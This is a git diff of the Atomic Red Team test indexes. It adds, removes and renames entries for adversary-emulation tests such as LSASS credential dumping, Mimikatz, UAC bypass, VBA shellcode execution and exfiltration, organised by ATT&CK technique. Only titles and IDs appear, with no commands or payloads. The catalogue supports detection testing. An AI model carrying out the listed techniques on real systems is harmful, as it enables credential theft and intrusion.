execution,T1047,Windows Management Instrumentation,2,WMI Reconnaissance Processes,5750aa16-0e59-4410-8b9a-8a47ca2788e2,command_prompt
@@ -476,47 +531,6 @@ execution,T1047,Windows Management Instrumentation,5,WMI Execute Local Process,b
execution,T1047,Windows Management Instrumentation,6,WMI Execute Remote Process,9c8ef159-c666-472f-9874-90c8d60d136b,command_prompt
exfiltration,T1020,Automated Exfiltration,1,IcedID Botnet HTTP PUT,9c780d3d-3a14-4278-8ee5-faaeb2ccfbe0,powershell
exfiltration,T1048.003,Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol,2,Exfiltration Over Alternative Protocol - ICMP,dd4b4421-2e25-4593-90ae-7021947ad12e,powershell
-credential-access,T1056.004,Credential API Hooking,1,Hook PowerShell TLS Encrypt/Decrypt Messages,de1934ea-1fbf-425b-8795-65fb27dd7e33,powershell
-credential-access,T1552.001,Credentials In Files,3,Extracting passwords with findstr,0e56bf29-ff49-4ea5-9af4-3b81283fd513,powershell
-credential-access,T1552.001,Credentials In Files,4,Access unattend.xml,367d4004-5fc0-446d-823f-960c74ae52c3,command_prompt
-credential-access,T1555.003,Credentials from Web Browsers,1,Run Chrome-password Collector,8c05b133-d438-47ca-a630-19cc464c4622,powershell
-credential-access,T1555.003,Credentials from Web Browsers,3,LaZagne - Credentials from Browser,9a2915b3-3954-4cce-8c76-00fbf4dbd014,command_prompt
-credential-access,T1552.002,Credentials in Registry,1,Enumeration for Credentials in Registry,b6ec082c-7384-46b3-a111-9a9b8b14e5e7,command_prompt
-credential-access,T1552.002,Credentials in Registry,2,Enumeration for PuTTY Credentials in Registry,af197fd7-e868-448e-9bd5-05d1bcd9d9e5,command_prompt
-credential-access,T1056.002,GUI Input Capture,2,PowerShell - Prompt User for Password,2b162bfd-0928-4d4c-9ec3-4d9f88374b52,powershell
-credential-access,T1552.006,Group Policy Preferences,1,GPP Passwords (findstr),870fe8fb-5e23-4f5f-b89d-dd7fe26f3b5f,command_prompt
-credential-access,T1552.006,Group Policy Preferences,2,GPP Passwords (Get-GPPPassword),e9584f82-322c-474a-b831-940fd8b4455c,powershell
-credential-access,T1558.003,Kerberoasting,1,Request for service tickets,3f987809-3681-43c8-bcd8-b3ff3a28533a,powershell
-credential-access,T1056.001,Keylogging,1,Input Capture,d9b633ca-8efb-45e6-b838-70f595c6ae26,powershell
-credential-access,T1003.004,LSA Secrets,1,Dumping LSA Secrets,55295ab0-a703-433b-9ca4-ae13807de12f,command_prompt
-credential-access,T1003.001,LSASS Memory,1,Windows Credential Editor,0f7c5301-6859-45ba-8b4d-1fac30fc31ed,command_prompt
-credential-access,T1003.001,LSASS Memory,2,Dump LSASS.exe Memory using ProcDump,0be2230c-9ab3-4ac2-8826-3199b9a0ebf8,command_prompt
-credential-access,T1003.001,LSASS Memory,3,Dump LSASS.exe Memory using comsvcs.dll,2536dee2-12fb-459a-8c37-971844fa73be,powershell
-credential-access,T1003.001,LSASS Memory,4,Dump LSASS.exe Memory using direct system calls and API unhooking,7ae7102c-a099-45c8-b985-4c7a2d05790d,command_prompt
-credential-access,T1003.001,LSASS Memory,5,Dump LSASS.exe Memory using Windows Task Manager,dea6c349-f1c6-44f3-87a1-1ed33a59a607,manual
-credential-access,T1003.001,LSASS Memory,6,Offline Credential Theft With Mimikatz,453acf13-1dbd-47d7-b28a-172ce9228023,command_prompt
-credential-access,T1003.001,LSASS Memory,7,LSASS read with pypykatz,c37bc535-5c62-4195-9cc3-0517673171d8,command_prompt
-credential-access,T1003.003,NTDS,1,Create Volume Shadow Copy with vssadmin,dcebead7-6c28-4b4b-bf3c-79deb1b1fc7f,command_prompt
-credential-access,T1003.003,NTDS,2,Copy NTDS.dit from Volume Shadow Copy,c6237146-9ea6-4711-85c9-c56d263a6b03,command_prompt
-credential-access,T1003.003,NTDS,3,Dump Active Directory Database with NTDSUtil,2364e33d-ceab-4641-8468-bfb1d7cc2723,command_prompt
-credential-access,T1003.003,NTDS,4,Create Volume Shadow Copy with WMI,224f7de0-8f0a-4a94-b5d8-989b036c86da,command_prompt
-credential-access,T1003.003,NTDS,5,Create Volume Shadow Copy with Powershell,542bb97e-da53-436b-8e43-e0a7d31a6c24,powershell
-credential-access,T1003.003,NTDS,6,Create Symlink to Volume Shadow Copy,21748c28-2793-4284-9e07-d6d028b66702,command_prompt
-credential-access,T1040,Network Sniffing,3,Packet Capture Windows Command Prompt,a5b2f6a0-24b4-493e-9590-c699f75723ca,command_prompt
-credential-access,T1040,Network Sniffing,4,Windows Internal Packet Capture,b5656f67-d67f-4de8-8e62-b5581630f528,command_prompt
-credential-access,T1003,OS Credential Dumping,1,Powershell Mimikatz,66fb0bc1-3c3f-47e9-a298-550ecfefacbc,powershell
-credential-access,T1003,OS Credential Dumping,2,Gsecdump,96345bfc-8ae7-4b6a-80b7-223200f24ef9,command_prompt
-credential-access,T1003,OS Credential Dumping,3,Credential Dumping with NPPSpy,9e2173c0-ba26-4cdf-b0ed-8c54b27e3ad6,powershell
-credential-access,T1110.002,Password Cracking,1,Password Cracking with Hashcat,6d27df5d-69d4-4c91-bc33-5983ffe91692,command_prompt
-credential-access,T1556.002,Password Filter DLL,1,Install and Register Password Filter DLL,a7961770-beb5-4134-9674-83d7e1fa865c,powershell
-credential-access,T1110.001,Password Guessing,1,Brute Force Credentials,09480053-2f98-4854-be6e-71ae5f672224,command_prompt
-credential-access,T1110.003,Password Spraying,1,Password Spray all Domain Users,90bc2e54-6c84-47a5-9439-0a2a92b4b175,command_prompt
-credential-access,T1110.003,Password Spraying,2,Password Spray (DomainPasswordSpray),263ae743-515f-4786-ac7d-41ef3a0d4b2b,powershell
-credential-access,T1552.004,Private Keys,1,Private Keys,520ce462-7ca7-441e-b5a5-f8347f632696,command_prompt
-credential-access,T1003.002,Security Account Manager,1,"Registry dump of SAM, creds, and secrets",5c2571d0-1572-416d-9676-812e64ca9f44,command_prompt
-credential-access,T1003.002,Security Account Manager,2,Registry parse with pypykatz,a96872b2-cbf3-46cf-8eb4-27e8c0e85263,command_prompt
-credential-access,T1003.002,Security Account Manager,3,esentutl.exe SAM copy,a90c2f4d-6726-444e-99d2-a00cd7c20480,command_prompt
-credential-access,T1003.002,Security Account Manager,4,PowerDump Registry dump of SAM for hashes and usernames,804f28fc-68fc-40da-b5a2-e9d0bce5c193,powershell
lateral-movement,T1021.003,Distributed Component Object Model,1,PowerShell Lateral Movement using MMC20,6dc74eb1-c9d6-4c53-b3b5-6f50ae339673,powershell
lateral-movement,T1550.002,Pass the Hash,1,Mimikatz Pass the Hash,ec23cef9-27d9-46e4-a68d-6f75f7b86908,command_prompt
lateral-movement,T1550.002,Pass the Hash,2,crackmapexec Pass the Hash,eb05b028-16c8-4ad8-adea-6f5b219da9a9,command_prompt
diff --git a/atomics/Indexes/Indexes-Markdown/index.md b/atomics/Indexes/Indexes-Markdown/index.md
index 51fb922f..5e5dcd3e 100644
--- a/atomics/Indexes/Indexes-Markdown/index.md
+++ b/atomics/Indexes/Indexes-Markdown/index.md
@@ -24,7 +24,7 @@
- T1547.002 Authentication Package [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1547 Boot or Logon Autostart Execution [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1037 Boot or Logon Initialization Scripts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
-- [T1548.002 Bypass User Access Control](../../T1548.002/T1548.002.md)
+- [T1548.002 Bypass User Account Control](../../T1548.002/T1548.002.md)
- Atomic Test #1: Bypass UAC using Event Viewer (cmd) [windows]
- Atomic Test #2: Bypass UAC using Event Viewer (PowerShell) [windows]
- Atomic Test #3: Bypass UAC using Fodhelper [windows]
@@ -107,12 +107,15 @@
- T1055.002 Portable Executable Injection [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- [T1546.013 PowerShell Profile](../../T1546.013/T1546.013.md)
- Atomic Test #1: Append malicious start-process cmdlet [windows]
+- T1547.012 Print Processors [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1055.009 Proc Memory [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1055.013 Process Doppelgänging [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- [T1055.012 Process Hollowing](../../T1055.012/T1055.012.md)
- Atomic Test #1: Process Hollowing using PowerShell [windows]
+ - Atomic Test #2: RunPE via VBA [windows]
- [T1055 Process Injection](../../T1055/T1055.md)
- Atomic Test #1: Process Injection via mavinject.exe [windows]
+ - Atomic Test #2: Shellcode execution via VBA [windows]
- T1055.008 Ptrace System Calls [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- [T1037.004 Rc.common](../../T1037.004/T1037.004.md)
- Atomic Test #1: rc.common [macos]
@@ -132,6 +135,7 @@
- Atomic Test #2: Scheduled task Local [windows]
- Atomic Test #3: Scheduled task Remote [windows]
- Atomic Test #4: Powershell Cmdlet Scheduled Task [windows]
+ - Atomic Test #5: Task Scheduler via VBA [windows]
- T1053 Scheduled Task/Job [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- [T1546.002 Screensaver](../../T1546.002/T1546.002.md)
- Atomic Test #1: Set Arbitrary Binary as Screensaver [windows]
@@ -156,6 +160,7 @@
- Atomic Test #3: Disable tty_tickets for sudo caching [macos, linux]
- [T1543.002 Systemd Service](../../T1543.002/T1543.002.md)
- Atomic Test #1: Create Systemd Service [linux]
+- T1053.006 Systemd Timers [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1055.003 Thread Execution Hijacking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1055.005 Thread Local Storage [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1547.003 Time Providers [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
@@ -189,7 +194,7 @@
- Atomic Test #2: Domain Account and Group Manipulate [windows]
- T1098.003 Add Office 365 Global Administrator Role [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1137.006 Add-ins [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
-- T1098.001 Additional Azure Service Principal Credentials [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
+- T1098.001 Additional Cloud Credentials [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1546.009 AppCert DLLs [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- [T1546.010 AppInit DLLs](../../T1546.010/T1546.010.md)
- Atomic Test #1: Install AppInit Shim [windows]
@@ -303,6 +308,8 @@
- [T1546.013 PowerShell Profile](../../T1546.013/T1546.013.md)
- Atomic Test #1: Append malicious start-process cmdlet [windows]
- T1542 Pre-OS Boot [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
+- T1547.012 Print Processors [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
+- T1542.004 ROMMONkit [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- [T1037.004 Rc.common](../../T1037.004/T1037.004.md)
- Atomic Test #1: rc.common [macos]
- [T1547.007 Re-opened Applications](../../T1547.007/T1547.007.md)
@@ -324,6 +331,7 @@
- Atomic Test #2: Scheduled task Local [windows]
- Atomic Test #3: Scheduled task Remote [windows]
- Atomic Test #4: Powershell Cmdlet Scheduled Task [windows]
+ - Atomic Test #5: Task Scheduler via VBA [windows]
- T1053 Scheduled Task/Job [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- [T1546.002 Screensaver](../../T1546.002/T1546.002.md)
- Atomic Test #1: Set Arbitrary Binary as Screensaver [windows]
@@ -342,6 +350,8 @@
- T1542.001 System Firmware [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- [T1543.002 Systemd Service](../../T1543.002/T1543.002.md)
- Atomic Test #1: Create Systemd Service [linux]
+- T1053.006 Systemd Timers [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
+- T1542.005 TFTP Boot [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1547.003 Time Providers [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1205 Traffic Signaling [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- [T1505.002 Transport Agent](../../T1505.002/T1505.002.md)
@@ -366,6 +376,8 @@
- [T1003.008 /etc/passwd and /etc/shadow](../../T1003.008/T1003.008.md)
- Atomic Test #1: Access /etc/shadow (Local) [linux]
- Atomic Test #2: Access /etc/passwd (Local) [linux]
+- T1557.002 ARP Cache Poisoning [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
+- T1558.004 AS-REP Roasting [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- [T1552.003 Bash History](../../T1552.003/T1552.003.md)
- Atomic Test #1: Search Through Bash History [linux, macos]
- T1110 Brute Force [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
@@ -379,7 +391,8 @@
- Atomic Test #2: Extract passwords with grep [macos, linux]
- Atomic Test #3: Extracting passwords with findstr [windows]
- Atomic Test #4: Access unattend.xml [windows]
-- T1555 Credentials from Password Stores [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
+- [T1555 Credentials from Password Stores](../../T1555/T1555.md)
+ - Atomic Test #1: Extract Windows Credential Manager via VBA [windows]
- [T1555.003 Credentials from Web Browsers](../../T1555.003/T1555.003.md)
- Atomic Test #1: Run Chrome-password Collector [windows]
- Atomic Test #2: Search macOS Safari Cookies [macos]
@@ -425,6 +438,7 @@
- Atomic Test #4: Create Volume Shadow Copy with WMI [windows]
- Atomic Test #5: Create Volume Shadow Copy with Powershell [windows]
- Atomic Test #6: Create Symlink to Volume Shadow Copy [windows]
+- T1556.004 Network Device Authentication [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- [T1040 Network Sniffing](../../T1040/T1040.md)
- Atomic Test #1: Packet Capture Linux [linux]
- Atomic Test #2: Packet Capture macOS [macos]
@@ -464,6 +478,74 @@
- T1552 Unsecured Credentials [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1056.003 Web Portal Capture [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
+# collection
+- T1557.002 ARP Cache Poisoning [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
+- [T1560 Archive Collected Data](../../T1560/T1560.md)
+ - Atomic Test #1: Compress Data for Exfiltration With PowerShell [windows]
+- T1560.003 Archive via Custom Method [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
+- T1560.002 Archive via Library [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
+- [T1560.001 Archive via Utility](../../T1560.001/T1560.001.md)
+ - Atomic Test #1: Compress Data for Exfiltration With Rar [windows]
+ - Atomic Test #2: Compress Data and lock with password for Exfiltration with winrar [windows]
+ - Atomic Test #3: Compress Data and lock with password for Exfiltration with winzip [windows]
+ - Atomic Test #4: Compress Data and lock with password for Exfiltration with 7zip [windows]
+ - Atomic Test #5: Data Compressed - nix - zip [linux, macos]
+ - Atomic Test #6: Data Compressed - nix - gzip Single File [linux, macos]
+ - Atomic Test #7: Data Compressed - nix - tar Folder or File [linux, macos]
+ - Atomic Test #8: Data Encrypted with zip and gpg symmetric [macos, linux]
+- [T1123 Audio Capture](../../T1123/T1123.md)
+ - Atomic Test #1: using device audio capture commandlet [windows]
+- [T1119 Automated Collection](../../T1119/T1119.md)
+ - Atomic Test #1: Automated Collection Command Prompt [windows]
+ - Atomic Test #2: Automated Collection PowerShell [windows]
+ - Atomic Test #3: Recon information for export with PowerShell [windows]
+ - Atomic Test #4: Recon information for export with Command Prompt [windows]
+- [T1115 Clipboard Data](../../T1115/T1115.md)
+ - Atomic Test #1: Utilize Clipboard to store or execute commands from [windows]
+ - Atomic Test #2: Execute Commands from Clipboard using PowerShell [windows]
+ - Atomic Test #3: Execute commands from clipboard [macos]
+ - Atomic Test #4: Collect Clipboard Data via VBA [windows]
+- T1213.001 Confluence [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
+- [T1056.004 Credential API Hooking](../../T1056.004/T1056.004.md)
+ - Atomic Test #1: Hook PowerShell TLS Encrypt/Decrypt Messages [windows]
+- T1074 Data Staged [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
+- T1530 Data from Cloud Storage Object [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
+- T1602 Data from Configuration Repository [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
+- T1213 Data from Information Repositories [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
+- T1005 Data from Local System [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
+- T1039 Data from Network Shared Drive [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
+- T1025 Data from Removable Media [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
+- T1114 Email Collection [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
+- T1114.003 Email Forwarding Rule [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
+- [T1056.002 GUI Input Capture](../../T1056.002/T1056.002.md)
+ - Atomic Test #1: AppleScript - Prompt User for Password [macos]
+ - Atomic Test #2: PowerShell - Prompt User for Password [windows]
+- T1056 Input Capture [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
+- [T1056.001 Keylogging](../../T1056.001/T1056.001.md)
+ - Atomic Test #1: Input Capture [windows]
+- T1557.001 LLMNR/NBT-NS Poisoning and SMB Relay [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
+- [T1074.001 Local Data Staging](../../T1074.001/T1074.001.md)
+ - Atomic Test #1: Stage data from Discovery.bat [windows]
+ - Atomic Test #2: Stage data from Discovery.sh [linux, macos]
+ - Atomic Test #3: Zip a Folder with PowerShell for Staging in Temp [windows]
+- [T1114.001 Local Email Collection](../../T1114.001/T1114.001.md)
+ - Atomic Test #1: Email Collection with PowerShell Get-Inbox [windows]
+- T1185 Man in the Browser [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
+- T1557 Man-in-the-Middle [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
+- T1602.002 Network Device Configuration Dump [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
+- T1074.002 Remote Data Staging [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
+- T1114.002 Remote Email Collection [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
+- T1602.001 SNMP (MIB Dump) [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
+- [T1113 Screen Capture](../../T1113/T1113.md)
+ - Atomic Test #1: Screencapture [macos]
+ - Atomic Test #2: Screencapture (silent) [macos]
+ - Atomic Test #3: X Windows Capture [linux]
+ - Atomic Test #4: Capture Linux Desktop using Import Tool [linux]
+ - Atomic Test #5: Windows Screencapture [windows]
+- T1213.002 Sharepoint [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
+- T1125 Video Capture [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
+- T1056.003 Web Portal Capture [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
+
# defense-evasion
- T1548 Abuse Elevation Control Mechanism [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1134 Access Token Manipulation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
@@ -478,7 +560,7 @@
- [T1027.001 Binary Padding](../../T1027.001/T1027.001.md)
- Atomic Test #1: Pad Binary to Change Hash - Linux/macOS dd [macos, linux]
- T1542.003 Bootkit [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
-- [T1548.002 Bypass User Access Control](../../T1548.002/T1548.002.md)
+- [T1548.002 Bypass User Account Control](../../T1548.002/T1548.002.md)
- Atomic Test #1: Bypass UAC using Event Viewer (cmd) [windows]
- Atomic Test #2: Bypass UAC using Event Viewer (PowerShell) [windows]
- Atomic Test #3: Bypass UAC using Fodhelper [windows]
@@ -543,6 +625,8 @@
- Atomic Test #2: Certutil Rename and Decode [windows]
- [T1006 Direct Volume Access](../../T1006/T1006.md)
- Atomic Test #1: Read volume boot sector via DOS device path (PowerShell) [windows]
+- T1562.008 Disable Cloud Logs [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
+- T1600.002 Disable Crypto Hardware [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- [T1562.002 Disable Windows Event Logging](../../T1562.002/T1562.002.md)
- Atomic Test #1: Disable Windows IIS HTTP Logging [windows]
- Atomic Test #2: Kill Event Log Service Threads [windows]
@@ -581,6 +665,7 @@
- Atomic Test #24: Tamper with Windows Defender Evade Scanning -Process [windows]
- T1078.002 Domain Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1556.001 Domain Controller Authentication [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
+- T1601.002 Downgrade System Image [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1574.004 Dylib Hijacking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1055.001 Dynamic-link Library Injection [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1548.004 Elevated Execution with Prompt [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
@@ -604,9 +689,6 @@
- [T1553.001 Gatekeeper Bypass](../../T1553.001/T1553.001.md)
- Atomic Test #1: Gatekeeper Bypass [macos]
- T1484 Group Policy Modification [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
-- [T1562.003 HISTCONTROL](../../T1562.003/T1562.003.md)
- - Atomic Test #1: Disable history collection [linux, macos]
- - Atomic Test #2: Mac HISTCONTROL [macos, linux]
- T1564.005 Hidden File System [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- [T1564.001 Hidden Files and Directories](../../T1564.001/T1564.001.md)
- Atomic Test #1: Create a hidden file in a hidden directory [linux, macos]
@@ -623,6 +705,9 @@
- Atomic Test #1: Hidden Window [windows]
- T1564 Hide Artifacts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1574 Hijack Execution Flow [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
+- [T1562.003 Impair Command History Logging](../../T1562.003/T1562.003.md)
+ - Atomic Test #1: Disable history collection [linux, macos]
+ - Atomic Test #2: Mac HISTCONTROL [macos, linux]
- T1562 Impair Defenses [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- [T1562.006 Indicator Blocking](../../T1562.006/T1562.006.md)
- Atomic Test #1: Auditing Configuration Changes on Linux Host [linux]
@@ -682,6 +767,7 @@
- Atomic Test #4: Add domain to Trusted sites Zone [windows]
- Atomic Test #5: Javascript in registry [windows]
- Atomic Test #6: Change Powershell Execution Policy to Bypass [windows]
+- T1601 Modify System Image [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- [T1218.005 Mshta](../../T1218.005/T1218.005.md)
- Atomic Test #1: Mshta executes JavaScript Scheme Fetch Remote Payload With GetObject [windows]
- Atomic Test #2: Mshta executes VBScript to execute malicious command [windows]
@@ -701,6 +787,9 @@
- Atomic Test #2: Store file in Alternate Data Stream (ADS) [windows]
- Atomic Test #3: Create ADS command prompt [windows]
- Atomic Test #4: Create ADS PowerShell [windows]
+- T1599.001 Network Address Translation Traversal [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
+- T1599 Network Boundary Bridging [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
+- T1556.004 Network Device Authentication [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- [T1070.005 Network Share Connection Removal](../../T1070.005/T1070.005.md)
- Atomic Test #1: Add Network Share [windows]
- Atomic Test #2: Remove Network Share [windows]
@@ -725,6 +814,7 @@
- Atomic Test #1: Mimikatz Kerberos Ticket Attack [windows]
- [T1556.002 Password Filter DLL](../../T1556.002/T1556.002.md)
- Atomic Test #1: Install and Register Password Filter DLL [windows]
+- T1601.001 Patch System Image [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1574.007 Path Interception by PATH Environment Variable [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1574.008 Path Interception by Search Order Hijacking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- [T1574.009 Path Interception by Unquoted Path](../../T1574.009/T1574.009.md)
@@ -737,11 +827,15 @@
- T1055.013 Process Doppelgänging [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- [T1055.012 Process Hollowing](../../T1055.012/T1055.012.md)
- Atomic Test #1: Process Hollowing using PowerShell [windows]
+ - Atomic Test #2: RunPE via VBA [windows]
- [T1055 Process Injection](../../T1055/T1055.md)
- Atomic Test #1: Process Injection via mavinject.exe [windows]
+ - Atomic Test #2: Shellcode execution via VBA [windows]
- T1055.008 Ptrace System Calls [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- [T1216.001 PubPrn](../../T1216.001/T1216.001.md)
- Atomic Test #1: PubPrn.vbs Signed Script Bypass [windows]
+- T1542.004 ROMMONkit [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
+- T1600.001 Reduce Key Space [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1108 Redundant Access [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- [T1218.009 Regsvcs/Regasm](../../T1218.009/T1218.009.md)
- Atomic Test #1: Regasm Uninstall Method Call Test [windows]
@@ -794,6 +888,8 @@
- Atomic Test #3: Register-CimProvider - Execute evil dll [windows]
- Atomic Test #4: InfDefaultInstall.exe .inf Execution [windows]
- Atomic Test #5: ProtocolHandler.exe Downloaded a Suspicious File [windows]
+ - Atomic Test #6: Microsoft.Workflow.Compiler.exe Payload Execution [windows]
+ - Atomic Test #7: Renamed Microsoft.Workflow.Compiler.exe Payload Executions [windows]
- [T1216 Signed Script Proxy Execution](../../T1216/T1216.md)
- Atomic Test #1: SyncAppvPublishingServer Signed Script PowerShell Command Execution [windows]
- Atomic Test #2: manage-bde.wsf Signed Script Command Execution [windows]
@@ -815,6 +911,7 @@
- Atomic Test #2: Detect Virtualization Environment (Windows) [windows]
- Atomic Test #3: Detect Virtualization Environment (MacOS) [macos]
- T1542.001 System Firmware [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
+- T1542.005 TFTP Boot [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1221 Template Injection [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1055.003 Thread Execution Hijacking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1055.005 Thread Local Storage [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
@@ -836,9 +933,12 @@
- T1535 Unused/Unsupported Cloud Regions [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1550 Use Alternate Authentication Material [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1497.002 User Activity Based Checks [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
+- T1564.007 VBA Stomping [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1055.014 VDSO Hijacking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1078 Valid Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
+- T1218.012 Verclsid [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1497 Virtualization/Sandbox Evasion [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
+- T1600 Weaken Encryption [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1550.004 Web Session Cookie [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- [T1222.001 Windows File and Directory Permissions Modification](../../T1222.001/T1222.001.md)
- Atomic Test #1: Take ownership using takeown utility [windows]
@@ -918,6 +1018,7 @@
- Atomic Test #7: List Internet Explorer Bookmarks using the command prompt [windows]
- T1087.004 Cloud Account [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1069.003 Cloud Groups [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
+- T1580 Cloud Infrastructure Discovery [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1538 Cloud Service Dashboard [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1526 Cloud Service Discovery [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- [T1087.002 Domain Account](../../T1087.002/T1087.002.md)
@@ -1058,6 +1159,83 @@
- T1497.002 User Activity Based Checks [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1497 Virtualization/Sandbox Evasion [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
+# resource-development
+- T1583 Acquire Infrastructure [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
+- T1583.005 Botnet [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
+- T1584.005 Botnet [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
+- T1587.002 Code Signing Certificates [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
+- T1588.003 Code Signing Certificates [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
+- T1586 Compromise Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
+- T1584 Compromise Infrastructure [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
+- T1583.002 DNS Server [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
+- T1584.002 DNS Server [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
+- T1587 Develop Capabilities [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
+- T1587.003 Digital Certificates [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
+- T1588.004 Digital Certificates [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
+- T1583.001 Domains [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
+- T1584.001 Domains [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
+- T1585.002 Email Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
+- T1586.002 Email Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
+- T1585 Establish Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
